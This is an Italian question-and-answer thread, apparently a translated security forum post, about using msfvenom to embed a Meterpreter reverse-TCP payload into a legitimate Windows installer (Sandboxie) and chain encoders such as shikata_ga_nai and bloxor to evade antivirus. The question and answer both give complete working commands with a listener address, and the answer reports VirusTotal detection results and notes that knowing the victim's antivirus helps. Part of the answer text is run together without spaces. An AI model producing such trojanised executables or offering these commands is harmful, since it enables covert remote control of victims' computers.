Codifica un file eseguibile più volte usando il veleno MSF

Naviga le tue risposte
5

Sto provando più codifiche sullo stesso file eseguibile, ma confuso con la sintassi.

Il problema:

Per codificare qualsiasi file eseguibile possiamo usare la sintassi: 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X
LPORT=XXXX -x /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe

Ora, voglio codificare qualche altro file eseguibile / stesso file; più volte utilizzando diversi encoder.
Sintassi che sto usando: 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XX -x  /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe

Ho trovato questo thread quindi implementato la sintassi precedente. Ma il file di output che sta generando non ha il file eseguibile incluso. Poiché la dimensione dell'output dalla prima sintassi è 19 MB e dalla seconda sintassi è 76kB.

Quindi, la mia domanda è come posso implementare più codifiche sullo stesso file eseguibile.

    
posta neferpitou 18.03.2017 - 17:45
fonte

1 risposta

2

Come sappiamo, la codifica non aiuta troppo nell'evadere l'AV ma ho ottenuto risultati interessanti dopo aver provato poche cose e se conosciamo il nome AV sulla macchina della vittima possiamo tentare la fortuna con questo metodo.

Metodo uno: 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -x /root/Downloads/SandboxieInstall.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encodedsandbox.exe

Ho usato Sandboxie per questo metodo e ha convertito file da 9 MB in file da 17,9 MB. Quindi caricato su VirusTotal.

DalloscreenshotpuoivedereAVcomeAvast,eScan,ESETèstatoingradodiscansionarlocomeuncavallodiTroia.Tuttavia,solopochiAVnonlohannorilevatocomemostratodiseguito.

Oraarrivailsecondometodochehopostonelladomanda"e codifica un file eseguibile più volte usando veleno MSF". Infine, sono stato in grado di implementarlo e ho trovato risultati più interessanti. 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -e x86/shikata_ga_nai -i 10 -f raw > eoncode.bin

msfvenom -p - -x /root/Downloads/SandboxieInstall.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 > sanbox.exe < eoncode.bin

La sintassi è leggermente diversa da quella che ho menzionato sopra nella domanda, ma ha funzionato. Il file finale che ha generato era di 17.9 MB solo lo stesso del file precedente. Il nuovo file generato funzionerà come il software originale a causa del flag "-k" e il risultato di VirusTotal è lo stesso del precedente ma ho avuto successo in quello che stavo cercando di implementare.

Se rimuoviamo il flag "-k" dall'ultima sintassi, genererà il file exe di 9 MB e l'icona sarà uguale al software originale, ad esempio Sandboxie, ma perderà la sua funzionalità originale (dopo aver aperto il file non accadrà nulla rimosso il flag "-k", dal momento che ha le stesse dimensioni dell'icona originale del file ps anche se sembra che le stesse persone lo possano eseguire). Ma quando l'ho caricato su VirusTotal ho trovato alcuni risultati interessanti come mostrato di seguito.

Che è esattamente l'opposto del risultato sopra.

    
risposta data 19.03.2017 - 21:30
fonte

Leggi altre domande sui tag

comportamento spettrale con Authy Perché non usiamo più algoritmi per proteggerci da attacchi come SHAttered?